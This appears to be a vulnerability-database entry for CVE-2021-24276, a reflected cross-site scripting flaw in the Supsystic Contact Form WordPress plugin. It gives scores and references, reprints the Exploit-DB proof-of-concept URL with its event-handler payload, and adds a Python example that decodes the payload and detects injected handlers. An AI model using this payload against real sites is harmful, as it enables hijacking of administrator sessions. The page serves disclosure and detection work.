CVE-2021-24276
Published 2021-05-05
Priority: P3 (45)
Severity: medium, CVSS 3.1 base score 6.1
Exploit: available (see Exploit-DB and Nuclei below)
EPSS: 16.04% (96.5th percentile)
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | contact_form | < 1.7.15 | 1.7.15 |
| supsystic | contact_form_by_supsystic | < 1.7.15 | 1.7.15 |

(The second range was listed as ">= 1.7.15 < 1.7.15", which is empty; both product identifiers cover the same plugin and the same pre-1.7.15 versions.)
CVSS provenance

| Source | CVSS | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB
WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
exploitdb · 2021-09-28 · CVSS 6.1 · MEDIUM
```text
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
```
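Why the Exploit-DB payload above works, and a check that separates a vulnerable response from a fixed one, as an added example (not code from the plugin, the Exploit-DB entry or the Nuclei template). The two render functions are assumed stand-ins for the plugin's options page, whose markup this page does not show; the `<a>` tag and the `data-tab` attribute name are illustration choices. The check parses the HTML instead of grepping it, which also covers the Nuclei-style question of whether an injected handler really lands as an attribute.

```python
"""Added example for CVE-2021-24276: decode the PoC, render it through an
assumed vulnerable and an assumed fixed attribute sink, and detect the injection.

render_vulnerable/render_fixed are NOT the plugin's code; they are assumptions
that reproduce the behaviour the advisory describes (unescaped vs. escaped
attribute output)."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Public proof-of-concept URL from the Exploit-DB entry.
POC_URL = ("/wp-admin/admin.php?page=contact-form-supsystic"
           '&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//')


def tab_param(url: str) -> str:
    """Decode ?tab= the way PHP's $_GET does: '+' becomes a space, %xx is decoded."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("tab", [""])[0]


def render_vulnerable(tab: str) -> str:
    """Assumed pre-1.7.15 behaviour: the raw value is written into an attribute."""
    return f'<a href="#" class="nav-tab" data-tab="{tab}">Settings</a>'


def render_fixed(tab: str) -> str:
    """Assumed fixed behaviour: attribute-escape first. html.escape(quote=True)
    encodes the same characters WordPress esc_attr() does: & < > " and '."""
    return f'<a href="#" class="nav-tab" data-tab="{html.escape(tab, quote=True)}">Settings</a>'


class _HandlerFinder(HTMLParser):
    """Collects every on* attribute name the HTML tokenizer produces."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.startswith("on"):
                self.handlers.append(name)


def injected_event_handlers(body: str) -> list[str]:
    """Event-handler attributes present in a response body.

    Parsing matters: the fixed page still contains the literal text
    'onanimationstart=' inside the escaped attribute value, but no browser
    treats it as an attribute there, and neither does the parser."""
    finder = _HandlerFinder()
    finder.feed(body)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    tab = tab_param(POC_URL)
    # Decoded value: '" style=animation-name:rotation onanimationstart=alert(/XSS/)//'
    # The leading '"' closes data-tab; the spaces (from '+') start two new
    # attributes: a style that starts a CSS animation (the event only fires if a
    # @keyframes rule named "rotation" exists on the page) and an onanimationstart
    # handler. The trailing '//' comments out the leftover '"' inside the handler.
    print("vulnerable:", render_vulnerable(tab))
    print("  handlers:", injected_event_handlers(render_vulnerable(tab)))
    print("fixed:     ", render_fixed(tab))
    print("  handlers:", injected_event_handlers(render_fixed(tab)))
```

Two points the vector on this page already encodes: the URL sits under /wp-admin/, so the payload only fires for a victim who opens the link while logged in with access to the options page (UI:R), and the attacker needs no account of their own (PR:N). A scanner that only checks for `text/html` and a 200 status, as the surviving Nuclei matchers do, still needs the body check above (or an equivalent reflected-marker match) before reporting the host as vulnerable.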
Nuclei
WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
nuclei · CVSS 6.1 · MEDIUM

Only the tail of the template is on this page: the request block and the body matcher are missing, and the fragment `alert(document.domain)'` is all that remains of the payload/matcher line. Surviving matchers:

```yaml
- type: word
  part: header
  words:
    - "text/html"

- type: status
  status:
    - 200

# digest: 4b0a00483046022100fbbe63cf7104dd88ac10f21af0872f3964541388d34c3b8c83d147798076b61d022100e5a3dffc5b0f905ebe91a238a065216ac64bf3f0fd1914647c1458f6ccec3590:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
References
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
- http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html